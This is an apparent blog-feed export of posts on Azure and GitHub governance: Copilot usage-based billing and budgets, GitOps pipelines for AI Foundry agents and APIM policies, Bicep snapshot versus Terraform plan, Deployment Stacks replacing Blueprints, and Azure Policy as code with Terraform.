Efficient from a pure licensing standpoint, yes. But it is exactly the shared-cost drift that creates billing surprises in every other metered Azure service. You do not notice it until the invoice arrives. | Plan | Audience | Base price | Included monthly AI Credits | |---|---|---|---| | Copilot Free | Personal | Free | Limited allowance, plan-specific | | Copilot Pro | Personal | $10/month | 1,000 AI Credits | | Copilot Pro+ | Personal | $39/month | 3,900 AI Credits | | Copilot Business | Teams and organisations | $19/user/month | 1,900 AI Credits per user, pooled | | Copilot Enterprise | Enterprise organisations | $39/user/month | 3,900 AI Credits per user, pooled | ## Promotional credits GitHub is giving existing Copilot Business and Copilot Enterprise customers a temporary credit uplift for the first three months of usage-based billing. The window runs from 1 June to 1 September 2026, covering June, July and August. I want to be direct about what that means: those higher allowances disappear on 1 September. Any usage pattern that looks acceptable during the promotional period will cost more from September. If you have not established baselines by then, you will have no context for explaining the bill change to finance. | Plan | Standard monthly AI Credits | Promotional monthly AI Credits | Credits after 1 September 2026 | |---|---|---|---| | Copilot Business | 1,900 | 3,000 | 1,900 | | Copilot Enterprise | 3,900 | 7,000 | 3,900 | In commercial terms, which are usually easier to communicate to leadership, during the promotional period Copilot Business includes $30/month of AI Credits and Enterprise includes $70/month. After September, those drop back to the face-value subscription amounts of $19 and $39 respectively. | Plan | Standard included value | Promotional included value | Promotion ends | |---|---|---|---| | Copilot Business | $19/month | $30/month | 1 September 2026 | | Copilot Enterprise | $39/month | $70/month | 1 September 2026 | ## Same licence, very different spend is now your problem The cost of any given Copilot interaction depends on two things: the model and the token count. A short inline suggestion on a lightweight model barely registers. A multi-file agentic session on a frontier model can consume materially more credits than that same developer’s entire previous month of usage. That is not a bug. It is the model working as designed. But it means you cannot assume uniform cost per seat any more. The same pattern shows up with Azure OpenAI and AI Foundry credits: the variance between power users and casual users is usually far wider than most teams expect. | Cost driver | Why it matters | |---|---| | Model choice | More capable frontier models cost more per token | | Prompt size | Larger inputs consume more tokens | | Output size | Longer generated responses add more billed tokens | | Cached context | Reused context still contributes to measured usage | | Agentic workflows | Multi-step and multi-file tasks consume more credits | ## Governance, not spend controls It is worth resisting the framing of “how to stop runaway costs”. That implies something has already gone wrong. The more useful frame is to treat Copilot like any other metered cloud service from day one. You would not give your whole organisation unrestricted Azure OpenAI API access and then act surprised when the bill was high. The same logic applies here. GitHub provides budget controls at user, cost-centre, organisation and enterprise level. Use them before you need them. | Control | What it does | Why it helps | |---|---|---| | User-level budget | Caps what one user can consume | Prevents one person draining the shared pool | | Cost-centre budget | Limits charges for a department or group | Supports accountability and showback | | Organisation-level budget | Tracks and controls spend in one org | Useful for devolved operating models | | Enterprise spending limit | Caps total metered charges | Creates a hard ceiling for central IT and finance | The other lever is segmentation. Not every user needs paid overages, and not every team needs access to the most expensive models. Here is how I would split it: | User group | Suggested policy | Reason | |---|---|---| | High-value engineering teams | Allow metered usage with sensible budgets | Best chance of a measurable return | | Standard developers | Allow included credits, block paid overages | Good balance of value and control | | Contractors, interns, low-priority personas | Set $0 user budget | Prevents accidental spend | A $0 user budget is a legitimate default, not a punishment. It also starts a useful conversation about whether a given persona actually needs a Copilot seat at all. You can learn more on how to apply limits here: [Usage-based billing for organizations and enterprises - GitHub Docs](https://docs.github.com/en/copilot/concepts/billing/usage-based-billing-for-organizations-and-enterprises) ## Use the summer to establish baselines The promotional period is a measurement window. Treat it as one. June, July and August are the right time to baseline real consumption, identify which teams are heavy users and decide whether the productivity gain justifies steady-state spend once the September allowance kicks in. Skip that work and you will be making the business case for Copilot retrospectively, from an invoice, to a finance team that has just noticed the credit drop. It is also worth confirming developers are on current tooling. Copilot clients and integrations include usage visibility and warning thresholds, which are not a governance model on their own, but they do close the feedback loop for individual users before things compound at the organisation level. | Recommendation | Action | |---|---| | Baseline usage | Measure real consumption during June, July and August | | Set guardrails early | Apply budgets before 1 September 2026 | | Segment access | Only enable paid overages where there is a clear case | | Use visibility tools | Enable warnings and usage tracking in supported clients | | Review model usage | Check whether premium models are being used where cheaper ones would be sufficient | Copilot is a genuinely useful productivity platform. The 1 June change just means the hard part is no longer procurement. It is governance, cost attribution and having the conversation with engineering leads about what sensible use looks like before September turns it into a finance conversation instead. --- # Your AI Agents Are in Production. Who's Governing Them? - URL: https://blog.l-w.tech/blog/2026-05-27-AI-Foundry-Agent-Governance-GitOps - Date: 2026-05-27 - Author: Elliott Leighton-Woodruff - Tags: AI Agents, Azure AI Foundry, APIM, Infrastructure as Code, CI/CD, GitHub Actions, GitOps, DevOps, Platform Engineering, Terraform A two-repo pattern for managing AI Foundry agents, system prompts, guardrails and APIM policies as code. Approval gates, full audit trail, no portal clicking. Ask your team who approved the last change to your production agent's system prompt. If the answer involves silence, a shrug, or "I think someone edited it last Tuesday," you have a governance problem. The Foundry portal makes building an agent frictionless. Great for exploration, genuinely impressive for getting started quickly. The problem is what comes after. Once agents are doing something real in production, you need the same controls you would apply to any other code: an audit trail, a rollback path, an approval process before changes go live. ## The governance gap Creating an AI Foundry agent in the portal takes a few minutes. That genuinely is impressive. It is the right place to start when you are exploring. The problem starts when that agent goes into production. At that point you need answers to questions that a portal cannot give you: - Which version of the system prompt is live in production right now? - Who approved the last change to the guardrails? - How do you roll back if the agent starts misbehaving? - How do you promote a tested agent config from dev to prod without manual copy-paste? - What exactly is the difference between the dev and prod instructions? Every one of those is answerable if your agents live in Git. None of them are if they live in the portal. That matters more than it used to. Regulators in financial services, healthcare and critical infrastructure are increasingly asking about AI system change management. Cyber insurers are following suit. "We updated it in the portal" does not satisfy a post-incident review, an external audit or a board-level AI governance framework. If your agents are doing anything consequential (processing customer data, driving automated decisions, representing your business to users), the change history needs to exist and it needs to be reviewable. ## Two repos, two responsibilities I use two repos that handle different parts of the lifecycle. Keeping them separate is deliberate. The infrastructure layer is a Terraform configuration that provisions the full platform: APIM in front of Azure OpenAI via private endpoint, AI Foundry Hub and Project, a VNet with three subnets (APIM, Foundry, Workloads), NSGs, managed identities, RBAC, Log Analytics and Application Insights. Structuring this across four modules (networking, monitoring, foundry and apim) keeps the separation clean. APIM provisioning dominates the deployment time, so expect 35-45 minutes on first run. Your platform team touches this infrequently. High risk, low frequency. The agent repo is the star. It manages what runs on top of that infrastructure: agent definitions, system prompts, guardrails and the APIM policies that control access to them. Your AI team or product team touches this constantly. Lower blast radius, much higher frequency.

💻 Get the Code

GitOps CI/CD for managing AI Foundry agents and APIM policies as code. Fork it and drop in your own configs.

GitHub Repository
Mix these together and you get a networking change and a system prompt tweak in the same pull request. That is not a good time for anyone, especially not an auditor. The deeper reason the split matters is change velocity. The infrastructure layer follows your platform team's change process: formal review, probably through a change advisory board, before anything touches production. The agent repo moves faster: an AI team iterating on agent behaviour might merge several times a day during a development sprint. Put both in the same repo and one velocity has to win. Either your infrastructure process gets sloppy because it is moving alongside instruction tweaks, or your AI team's iteration slows to the pace of infrastructure change management. Neither outcome is good for the business. ## How the agent CI/CD repo works The model is simple on purpose: the folder structure is the deployment model. ``` src/ agents/ / dev.yaml test.yaml prod.yaml instructions.md ← system prompt (shared across envs by default) guardrails.md ← optional, auto-appended to instructions on deploy apim-policies/ dev/ agents-api.xml chat-api.xml test/ ... prod/ agents-api.xml ← tighter limits, IP filtering chat-api.xml ``` Adding a new agent means creating a folder. No pipeline changes needed. The deploy workflow discovers every folder under `src/agents/` automatically and deploys each one. Each environment YAML configures that agent for that environment: ```yaml # src/agents/my-agent/prod.yaml name: my-agent-prod display_name: "My Agent [PROD]" model: gpt-4o instructions_file: instructions.md ``` The `name` field is what gets registered in Foundry and exposed through APIM. The `-` convention keeps environments clearly separated in the Foundry project view. ### Instructions and guardrails as separate files The `instructions.md` is the functional system prompt: what the agent does, how it responds, its domain knowledge. Your AI team writes and iterates on this. The `guardrails.md` is separate and gets auto-appended to the instructions on every deploy. This is where safety constraints, data handling rules and things that must always be true regardless of what the instructions say live. Maintaining them separately means your AI team can iterate on instructions without accidentally removing a guardrail. Your platform or security team can update guardrails without touching every agent's instructions file. If you need environment-specific behaviour, `instructions.dev.md`, `instructions.test.md` and `instructions.prod.md` are supported. Dev environments can be more verbose for debugging; prod gets a tighter, more focused prompt. ### Branch equals environment Trunk-based deployment with environment branches: ``` dev branch → deploy to dev Foundry project test branch → deploy to test Foundry project main branch → deploy to prod Foundry project ``` Push a change to `dev` and the agent updates within a couple of minutes. For prod, you do not push directly. ### The promotion pipeline ``` deploy-dev ──(approve)──▶ deploy-test ──(approve)──▶ deploy-prod ``` Triggered manually from GitHub Actions. Before each environment, a reviewer gets a notification and has to approve. If any stage fails, everything downstream is blocked automatically. The manual trigger is a deliberate design choice, not a limitation. Branch deploys to dev are automatic because iteration in dev should be frictionless. Promoting to prod is a release decision, not a reflex. You choose when to run it, you choose who the reviewer is. That approval is logged against a real identity in a system you already use for code review. For teams operating under formal change management, this maps cleanly onto a standard change request. The pull request is the RFC. The promotion run is the deployment window. The approval gate is the CAB signoff. You get all of that without bolting a separate ITSM tool onto your pipeline. The evidence lives in GitHub Actions alongside the code. That approval chain lives in your Git history. You can answer "who approved the last prod deployment of this agent and when?" in about 10 seconds by looking at the Actions run. That is the governance capability the portal cannot give you. ## APIM policies alongside the agents Most write-ups about AI Foundry stop at the agent. APIM is where the runtime governance actually sits. Each layer has a distinct job. The infrastructure layer handles APIM at the platform level: the instance itself, the APIs and products, per-team subscription keys for access segregation, JWT validation via Entra ID so only authenticated identities can call your agents. Managed identity authentication to OpenAI means no API keys are stored anywhere. It also handles routing: the APIM policy maps requests to the correct Foundry project endpoint per environment, which means dev traffic cannot accidentally reach a prod agent. This is your platform team's domain and it changes infrequently. The agent repo handles the operational tuning that changes more often. The `src/apim-policies/` folder contains XML policy files per environment. Push a change, the Deploy APIM Policies workflow runs and the updated policy is live in around 30 seconds: ```xml ``` ```xml
1.2.3.4
``` No portal clicking. No "I think I changed it last Tuesday" with an auditor. The business case for the APIM layer goes beyond policy management. Per-team subscription keys give you cost attribution: you know which team or service is consuming tokens, not just the total spend on your OpenAI resource. Rate limits per subscription ID mean one misbehaving consumer cannot exhaust capacity for everyone else. If something starts hammering the API at 3am, you can revoke that consumer's key without touching the agent or the infrastructure underneath it. This split keeps your platform team out of the blast radius when your AI team adjusts a rate limit. Your AI team stays out of Terraform when they do. ## Authentication: OIDC, not stored secrets The GitHub Actions workflows authenticate to Azure using OIDC federated credentials. No long-lived secrets in GitHub. Each environment has its own federated credential scoped to that environment: ```bash az ad app federated-credential create \ --id \ --parameters '{ "name": "github-env-prod", "issuer": "https://token.actions.githubusercontent.com", "subject": "repo:/:environment:prod", "audiences": ["api://AzureADTokenExchange"] }' ``` The service principal needs `Cognitive Services OpenAI Contributor` to manage agent definitions and `API Management Service Contributor` to push APIM policies, both scoped to the resource group. I apply the same OIDC pattern here that I use for Terraform pipelines. There is no reason an agent deployment pipeline should be held to a lower security standard than an infrastructure one. The risk model for long-lived secrets is simple: a leaked credential gives an attacker persistent access to deploy or modify anything the service principal can touch. With OIDC the token is minted per-workflow-run, scoped to that specific execution. It expires in minutes. There is nothing to exfiltrate and reuse. If the repo is ever compromised, your Azure environment is not compromised alongside it. ## What this gives you in practice The audit trail is the thing that matters most day to day. Every change to every instruction, every guardrail update, every policy tweak is in Git with a timestamp and an author. When something goes wrong at 2am you know exactly what changed and when. A bad instruction update is a `git revert` and a push. Back to the previous version in the time it takes the pipeline to run. Environment consistency follows directly from the model. Agents in dev, test and prod start from the same codebase and diverge only where you explicitly allow it. The "it works in dev but prod has different instructions" conversation stops happening. The PR review process is as much a cultural shift as a technical one. Changes to production agent behaviour going through the same review flow as any other code is worth pushing for, even if it feels slow at first. Two pairs of eyes on a system prompt change has saved me from some embarrassing production incidents. For teams in regulated environments, this pattern also produces something you cannot easily retrofit: documented AI control evidence. Your guardrails file, version-controlled with an approval history, is evidence that safety constraints were defined, maintained and reviewed. Your promotion pipeline approvals are evidence that changes went through a controlled process before reaching users. If you are working toward ISO 42001, preparing for a DORA assessment or responding to sector-specific AI governance requirements, this operational model gives you something concrete to point at. Trying to produce that evidence around a portal-managed process after the fact is considerably harder. ## Is this overkill? For a proof of concept: absolutely, yes. Use the portal. That is what it is there for. The test I apply is the same one I use for infrastructure: if this breaks in production, can you explain to your manager exactly what changed and when? If the answer is "I think someone edited the instructions last Tuesday," you need this. If the answer is "here is the PR, approved at 14:32 on Thursday, deployed to prod at 09:15 on Friday," you already have it. Fork the agent repo, drop in your own configs and see whether the model fits. It is intentionally lean: a starting point that shows how the pieces connect, not a platform you have to adopt wholesale. Are you running AI Foundry agents in production? What does your change management process for agent instructions look like? GitOps, portal, something in between? --- # I'm Still a Terraform Fan. But Bicep's New Snapshot Feature Made Me Look Twice - URL: https://blog.l-w.tech/blog/2026-03-31-Bicep-Snapshot-GA-Terraform-Plan - Date: 2026-03-31 - Author: Elliott Leighton-Woodruff - Tags: Azure, Bicep, Terraform, Infrastructure as Code, Platform Engineering, DevOps Bicep v0.41.2 makes Snapshot generally available and gives Azure-only teams an offline, reviewable way to preview change impact without Azure What-If noise. I'll be honest. **I love Terraform.** As much as you can love a tool, anyway. I've built platforms, teams plus delivery models around it. Its workflow is predictable, its ecosystem is massive and its `plan` experience set the standard most Infrastructure as Code tools still get measured against. For years I looked at Bicep the same way. Nice syntax. Strong Azure support. But where was the plan I could trust? Because no matter how clean the language is, if I cannot reliably preview change impact offline, safely and inside a pull request, it is not going to displace Terraform in my world. With Bicep `v0.41.2`, that changes. The `snapshot` command is now generally available, and for the first time I think Terraform engineers should pay proper attention to it. ## The long-standing problem with Azure What-If If you have ever tried to replace Terraform plan with Azure What-If, you already know the friction. It usually means: - Real Azure credentials are required. - Your validation step depends on live platform access. - RBAC, throttling plus provider noise can distort the result. - Pull request review becomes harder because the preview is tied to a live environment. - Output can be noisy enough that reviewers stop trusting it. That has been the main blocker for many Terraform-first engineers. The reaction has usually been pretty simple: I am not trading a clean Terraform plan for Azure What-If. I have felt exactly the same way. ## So does Snapshot really matter? Snapshot changes the model because it doesn't call Azure to generate the preview. It works from your `.bicepparam` and `.bicep` files, compiles them, expands the template and produces a normalised view of the resources that would be deployed. In practice that gives you something Terraform users will recognise immediately: - Deterministic output - Offline execution - No Azure credentials - No RBAC failures - No live API noise - A cleaner review artefact for pull requests That is the key point. Bicep has never had a credible offline change preview. Snapshot is that. ## Snapshot going GA in v0.41.2 is a bigger deal than it looks The Bicep `v0.41.2` release notes call out Snapshot as a **GA** feature. That matters because it shows Microsoft now sees this workflow as part of proper day-to-day Bicep usage, not just an interesting experiment. For platform teams, maturity matters as much as capability. A good idea behind an experimental flag is not the same as something you can start discussing as part of your CI/CD standard. Snapshot is now in the second category. ## What the command actually does At a high level, Snapshot creates a deployment snapshot from a `.bicepparam` file. The output is a `.snapshot.json` file that contains: - Predicted resources - Concrete values where those values can be resolved - Diagnostics produced during expansion That gives you a normalised view of expected state which is much easier to compare than raw template output. The important nuance is that Snapshot previews **expected state**, not **actual deployed state**. So it is not a drift detection engine and it is not a replacement for good deployment discipline. What it does give you is a reliable preview of what your Bicep code says should exist. ## The workflow Terraform engineers will immediately recognise If you come from Terraform, the easiest way to think about Snapshot is this: - `terraform plan` shows the delta between your current known state and the configuration you want to apply. - `bicep snapshot --mode overwrite` captures a normalised expected state from your Bicep code. - `bicep snapshot --mode validate` compares today's expected state to the previously captured snapshot and shows the difference. So no, Snapshot is not a direct clone of `terraform plan`. Terraform plan is state-aware and answers: what will change from where I am now? Snapshot answers a different question: has the deployment shape described by this code changed from the version I reviewed before? That matters, but it is also where things get more interesting. On its own, Snapshot is not a replacement for Terraform plan. But if you use Snapshot for clean, offline review and pair it with What-If when you want live platform validation, you are getting much closer to the kind of confidence people usually associate with state-aware operations. It still is not Terraform state, and I would not pretend otherwise, but for pull request workflows many teams are really trying to answer a simpler question before merge: what is the impact of this code change? ### Generate the baseline snapshot Use `overwrite` mode to create or replace the snapshot file: ```bash bicep snapshot main.bicepparam --mode overwrite ``` If you want the snapshot to resolve deployment metadata such as subscription, resource group or location, you can provide that explicitly: ```bash bicep snapshot main.bicepparam \ --subscription-id 3faf6056-8474-4818-a729-1aff55d6b3fa \ --resource-group myRg \ --location westus \ --mode overwrite ``` That creates `main.snapshot.json` next to the parameter file. ### Validate after your code change Once the baseline snapshot exists, use `validate` mode: ```bash bicep snapshot main.bicepparam --mode validate ``` Bicep compares the current calculated snapshot against the existing snapshot file and prints a diff. If changes are found the command exits non-zero, which makes it useful in automation and CI. That is why this feels familiar to Terraform users: 1. Capture a known-good expectation. 2. Change the code. 3. Re-run validation. 4. Review the diff. It is not Terraform state, but it absolutely supports the same kind of review workflow. ## Why this is valuable in pull requests The biggest win is not the command itself. It is what it enables. Snapshot makes it realistic to validate Bicep changes in a pull request without granting the pipeline direct Azure access for the preview step. That means: - No live subscription dependency for the preview - No extra secret handling for reviewers - No governance exceptions just to produce a pre-merge diff - A cleaner artefact that can be committed, compared or published in CI For regulated environments, that is a serious improvement. A lot of teams want stronger change review for Azure platform code but do not want preview jobs talking directly to live subscriptions. Snapshot gives them a cleaner middle ground. ## It introduces state-aware thinking without full state management I would not oversell this. Snapshot is not Terraform state. But it does encourage some of the same habits: - You can version the snapshot in Git. - You can compare branches with something more meaningful than text-level Bicep changes. - You can attach snapshot diffs to release notes or change records. - You can review expected platform evolution over time. That is useful because text diffs in IaC do not always tell the real story. A module refactor might look huge in Git while changing nothing in the resulting deployment shape. Snapshot helps cut through that noise. ## Practical caveats worth knowing There are still a few constraints. ### It is the standalone Bicep CLI Snapshot is available through the standalone `bicep` CLI. It is not a workflow I would describe as an `az bicep` feature. That separation is actually helpful because it keeps the experience more environment-agnostic and better suited to local development or CI. ### It is not drift detection Snapshot shows what your code predicts, not what Azure currently contains. You still need operational controls for: - Drift detection - Post-deployment validation - Deployment approvals - Environment hygiene In other words, Snapshot improves change review. It does not remove the need for runtime governance. ### Some values depend on deployment context If your templates rely on deployment metadata such as subscription, resource group or location, you should pass those explicitly when generating or validating snapshots. Otherwise you may end up with placeholder expressions where concrete values would be more useful. ## Will I stop using Terraform? No. Terraform still wins comfortably when I need: - Multi-cloud consistency - A huge provider and module ecosystem - Mature lifecycle handling - Real state management across teams and environments But that is no longer the whole story. If I were starting a greenfield Azure-only platform today, Bicep would be on the shortlist in a way it was not before. Snapshot removes the easiest objection Terraform engineers used to have, myself included. Predictability, trust and reviewability. Those are the basics of any IaC workflow worth running in CI, and Snapshot now delivers all three for Bicep. ## Try it in five minutes If you want to test whether this changes your view of Bicep, do this: 1. Install the standalone Bicep CLI at `v0.41.2` or later. 2. Pick a `.bicepparam` file. 3. Generate a snapshot: ```bash bicep snapshot main.bicepparam --mode overwrite ``` 4. Change your Bicep code. 5. Validate the snapshot: ```bash bicep snapshot main.bicepparam --mode validate ``` Then look at the diff and ask a simple question: Would I be happy reviewing this in a pull request? That is the real test. ## Final thought Terraform is not going anywhere. Neither is Bicep. But Bicep now has a feature Terraform engineers can respect. I am still a Terraform fan. But I am paying much closer attention now. Would Snapshot be enough for you to pilot Bicep on an Azure-only platform, or is Terraform still the default in your muscle memory? ## Learn more - [Bicep v0.41.2 release notes](https://github.com/Azure/bicep/releases/tag/v0.41.2) - [Using the snapshot command](https://github.com/Azure/bicep/blob/v0.41.2/docs/experimental/snapshot-command.md) --- # Azure Blueprints are dead! Welcome to Deployment Stacks - URL: https://blog.l-w.tech/blog/2026-03-18-AZ-Deployment-Stacks-Landing-Zone-Governance - Date: 2026-03-18 - Author: Elliott Leighton-Woodruff - Tags: Azure, Deployment Stacks, Landing Zones, Governance, Bicep, ARM Templates, Platform Engineering, IaC Azure Deployment Stacks bring predictable lifecycle control to landing zone governance and give IaC teams a practical path away from Azure Blueprints. For years Azure Blueprints sat in that awkward governance space many teams tolerated rather than loved. The idea was solid: package policy, RBAC plus resource definitions into a single governed unit. In real enterprise delivery, the experience was often painful. Blueprint-heavy estates usually hit the same issues: - Versioning became awkward once multiple teams touched the same baseline. - CI/CD integration stayed limited for code-first platform engineering. - Lock behaviour varied by scope and artifact type. - Updates could become destructive when artifacts drifted from original assumptions. - Deployments lacked truly idempotent behaviour across repeated runs. That persistent gap between portal-driven governance and IaC-driven delivery is exactly why Azure Deployment Stacks matter. ## What Azure Deployment Stacks Actually Are A Deployment Stack is an Azure resource that manages a set of deployed resources as one lifecycle unit. You define your baseline in Bicep or ARM JSON, then deploy it through a stack boundary at either: - Subscription scope - Management group scope (critical for landing zones) A practical mental model is: Template Specs + lifecycle control + drift protection + guardrails. Compared with Blueprints, Deployment Stacks give you: - IaC-native workflows - Proper CI/CD alignment - Predictable lifecycle operations - Drift prevention with deny-settings - Clean, deterministic deletion - Stronger convergence with Azure Landing Zones and CAF This resolves most of the long-standing governance friction in one move. ## Why this is a big change for platform teams Deployment Stacks are now generally available and positioned as the long-term successor to Blueprint-style governance. This is not a feature rename. It is a significant shift in how Azure expects landing zones and governance baselines to be managed. If your platform is already driven through: - Git - Bicep - ARM templates - Automated CI/CD pipelines Deployment Stacks finally align governance delivery with how your teams actually work. Blueprints often dragged teams back into portal-first workflows at the exact moment they needed repeatable automation. Deployment Stacks remove that tension. ## What you get that Blueprints struggled to provide ### 1. Predictable lifecycle management Deployment Stacks let you create, update plus remove governed resources as one managed unit. That makes change control more predictable during platform evolution. Instead of guessing what happens after a baseline update, you can model changes in code then apply them through a controlled deployment path. ### 2. Better drift protection Drift is still one of the biggest governance killers in Azure estates: - A policy assignment disabled during incident response. - A diagnostic setting removed to fix short-term ingestion issues. - A tag overwritten during migration activity. - A manual resource created outside approved templates. Deployment Stacks support deny settings that help block unauthorised modification or deletion. This gives platform teams a practical way to reduce just-this-once exceptions that later become audit findings. ### 3. Code-first governance (Bicep or ARM) Blueprints felt portal-first. Deployment Stacks are template-first. Your governance baseline now lives in Git with the same engineering discipline as application infrastructure. This unlocks engineering patterns platform teams expect: - Pull requests for governance changes - Integration with GitHub Actions or Azure DevOps - Non-production testing before enforcement - Versioned rollback points - Properly controlled change flows for security and compliance Stacks also integrate cleanly with Template Specs, the recommended way to store versioned IaC artifacts. ### 4. Better alignment with scale Large estates need repeatability under pressure. Stacks are built for large lifecycle operations where predictable updates plus deterministic cleanup matter. In short, this is governance that behaves more like modern platform engineering. ## Why you should migrate now Azure Blueprints are on a retirement path with retirement scheduled for July 11, 2026. Teams that wait risk a compressed cutover with avoidable delivery risk. Microsoft has published the retirement notice in the Azure Blueprints overview documentation: [Azure Blueprints (retirement notice)](https://learn.microsoft.com/azure/governance/blueprints/overview). If you still have critical governance tied to Blueprints, you are in technical debt territory. Migration planning needs runway because governance changes touch security, operations plus platform teams at the same time. ## High-level flow for Deployment Stacks Most teams will implement stacks with a sequence like this: 1. Author baseline modules in Bicep. Break your governance baseline into small, testable modules. 2. Compose a stack template. Combine modules into a single deployable governance unit. 3. Create the Deployment Stack. Deploy at subscription or management group scope. 4. Enable deny-settings. Do this after validating expected behaviour. 5. Update via CI/CD. Promote changes from dev to test to prod. 6. Decommission cleanly. Delete the stack boundary to remove governed resources predictably. This model is far closer to how platform teams already manage landing zones. ## Example baseline in Bicep A practical pattern is: keep your governance baseline in a Bicep file, then deploy that file through a Deployment Stack at subscription scope. ```bicep targetScope = 'subscription' @description('Policy definition id for mandatory diagnostics') param policyDefinitionId string resource enforceDiagnostics 'Microsoft.Authorization/policyAssignments@2021-06-01' = { name: 'enforce-diagnostic-logs' properties: { displayName: 'Enforce Diagnostic Logs' policyDefinitionId: policyDefinitionId enforcementMode: 'Default' } } ``` Create the stack resource from PowerShell (the syntax in Microsoft Learn uses this command pattern): ```powershell New-AzSubscriptionDeploymentStack ` -Name "lz-governance-baseline" ` -Location "uksouth" ` -TemplateFile "./baseline.bicep" ` -DeploymentResourceGroupName "rg-platform-stacks" ` -ActionOnUnmanage "detachAll" ` -DenySettingsMode "denyDelete" ``` CLI equivalent: ```bash az stack sub create \ --name lz-governance-baseline \ --location uksouth \ --template-file ./baseline.bicep \ --deployment-resource-group rg-platform-stacks \ --action-on-unmanage detachAll \ --deny-settings-mode denyDelete ``` In production you would usually split this into reusable modules then compose by scope. ## Where Deployment Stacks fit best Stacks are a strong fit when you manage: - Landing zone baselines. - Subscription governance controls. - Management group standards. - Shared platform resources. - Regulated environments with strict drift requirements. If your organisation uses Azure Landing Zones or CAF-aligned architecture, Deployment Stacks should be on your active roadmap now. ## Pragmatic migration plan from Blueprints The safest path is structured migration with side-by-side validation. 1. Inventory every Blueprint assignment. Capture scope, artifacts, version history plus lock behaviour. 2. Convert artifacts into Bicep modules. - Policies to policy assignments - RBAC to role assignments - ARM templates to Bicep modules - Resource groups to native modules 3. Recompose into stack templates. Create one stack per governance boundary. 4. Validate in non-production. Test side-by-side deployments before enforcing drift controls. 5. Re-evaluate lock semantics. Blueprint locks do not equal deny-settings. Decide governance intent, then model accordingly. 6. Progressive cut-over. Move environment by environment. Use release gates and compliance validation. ## Operational tips for a smoother transition - Start with audit-style controls in lower environments. - Add deny settings after evidence confirms expected behaviour. - Keep security, operations plus platform engineering in one review loop. - Track exceptions in Git issues rather than email threads. - Publish a clear support model for break-glass scenarios. Migration succeeds when governance is treated as product delivery, not as a one-time technical task. ## Finally Deployment Stacks are more than a replacement. They correct Azure's governance model for IaC-first estates. You gain stronger lifecycle control, better drift protection plus an operating pattern aligned with CI/CD. With Blueprint retirement approaching, early migration reduces operational risk. If your landing zone governance still relies on Blueprints, start the inventory phase now. Teams that move early will avoid a rushed 2026 transition. ## Learn More - [Azure Deployment Stacks documentation](https://learn.microsoft.com/azure/azure-resource-manager/bicep/deployment-stacks) - [Azure Blueprints overview (retirement notice)](https://learn.microsoft.com/azure/governance/blueprints/overview) --- # Azure Policy as Code: Getting started with IaC and CI/CD - URL: https://blog.l-w.tech/blog/2026-03-11-azure-policy-as-code-getting-started-iac-cicd - Date: 2026-03-11 - Author: Elliott Leighton-Woodruff - Tags: Azure, Terraform, Infrastructure as Code, CI/CD, Security, Governance Get started with Azure Policy managed through IaC and deliver governance that scales with your infrastructure. ## What is Azure Policy and why should I use it? Azure Policy enforces your organisation's rules at resource creation time. It acts like guardrails for your cloud estate, catching bad patterns before they land in production. It works across four effects: - Deny stops bad patterns outright - no public IPs on VMs, no resources in unapproved regions. - Audit flags drift without blocking - missing tags or diagnostic settings show up in compliance reports. - DeployIfNotExists auto-fixes common gaps - enabling logging on Key Vaults that someone forgot. - Modify updates resources automatically - adding missing tags to untagged VMs. Platform teams love it because you get a single compliance view across hundreds of subscriptions. It stops "works on my machine" configs breaking prod compliance. Every evaluation gets logged with who/when/what for audit-proof governance. And it scales with zero runtime cost. There's just one problem. Policies clicked into the portal drift between teams, lack version history and nobody knows who owns them. ## How do you enforce policy without breaking prod day one? Most teams try Azure Policy, hit drift or breakage, then quietly back away. I’ve seen the same pattern across enterprises: - Security baselines that differ between dev and prod. - “Who changed that assignment?” asked in every audit. - Platform teams chasing portal drift instead of shipping improvements. - Compliance dashboards nobody trusts because nobody can explain the underlying rules. The root cause is always the same. Policy lives in the portal. Everything else lives in Git. Policy as Code flips that. | Portal-first policy chaos | Git + Terraform framework | |---|---| | Portal-only | Git-driven source of truth | | Manual changes, no audit | PRs + pipeline deployments | | Definitions buried in HCL | Readable JSON artefacts | | All-or-nothing enforcement | Audit-first rollout | | One-off demos | Scales to hundreds of subscriptions | Policy definitions and assignments sit in Git next to your Terraform. CI/CD pipelines become the single route to production. Every change is reviewed, tested and auditable like any other piece of infrastructure. Having worked with IaC and policy for years now I know it can be quite daunting, so to get you started you can use my repo to get to grips with how it deploys and manages Azure Policy. From here you can build out everything you need to manage your platform at scale. ## The three pieces of Azure Policy Due to some weird naming in policy its worth explaining that Azure Policy breaks down into three core components: ### Definitions The JSON that describes the rule. Examples: - Deny public IPs on NICs - Require cost centre tags Definitions typically live at management group scope and are reusable across your estate. ### Initiatives Logical groupings of definitions for a purpose. Examples: - **Platform baseline**: tags + locations + diagnostics - **Landing zone baseline**: platform baseline plus deny public IPs ### Assignments Where those definitions or initiatives apply in your hierarchy. Assignments can target management groups, subscriptions, or resource groups with environment-specific parameters like allowed locations. Policy as Code means all three live in Git, versioned and parameterised, deployed through Terraform modules that hide provider boilerplate. No more portal drift. Every environment inherits the same guardrails. ## Getting started with Policy as code using Terraform

💻 Get the Code

Azure Policy as Code framework with Terraform modules and audit-first enforcement

GitHub Repository
The IaC Azure Spring Clean 2026 Policy repo is a module‑based baseline for platform teams enforcing Azure Policy across a management group hierarchy. Deploy this into your tenant without risk and learn how TF and policy go hand in hand. The solution can endlessly scale and is built around: **Policy artefacts as first‑class JSON** in `policies/definitions/` – policy logic is readable and diffable, not buried in HCL strings. **Three thin Terraform modules** – `policy_definition`, `policy_initiative` and `policy_assignment` encapsulate the azurerm provider surface so callers only deal with typed variables. **Two‑layer deployment model** – the non‑prod workspace owns definitions and initiatives; the prod workspace references them via data sources and tightens assignment effects. This mirrors EPAC and Azure Landing Zone patterns. **Audit‑first enforcement** – non‑prod assignments use `enforce = false` so Azure Policy runs in DoNotEnforce mode: compliance is evaluated and reported, but nothing is blocked. Running `terraform apply` in `terraform/env/nonprod` creates eight Azure resources: | # | Resource type | Name | |---|---|---| | 1-4 | `azurerm_policy_definition` | `deny-public-ip-on-nics`, `require-tags`, `allowed-locations`, `diagnostics-key-services` | | 5-6 | `azurerm_policy_set_definition` | `platform-baseline`, `landing-zone-baseline` | | 7-8 | `azurerm_management_group_policy_assignment` | `plat-base-np` -> `mg-platform`, `lz-base-np` -> `mg-landing-zones` | Both assignments stay in audit mode until you choose to enforce. ## The baseline: security, governance, compliance, monitoring The baseline ships with four concrete policies grouped into two initiatives: | Policy | Effect | Scope | Why it matters | |---|---|---|---| | `deny-public-ip` | `deny` (hardcoded) | `Microsoft.Network/networkInterfaces` | Prevents accidental public exposure on VMs | 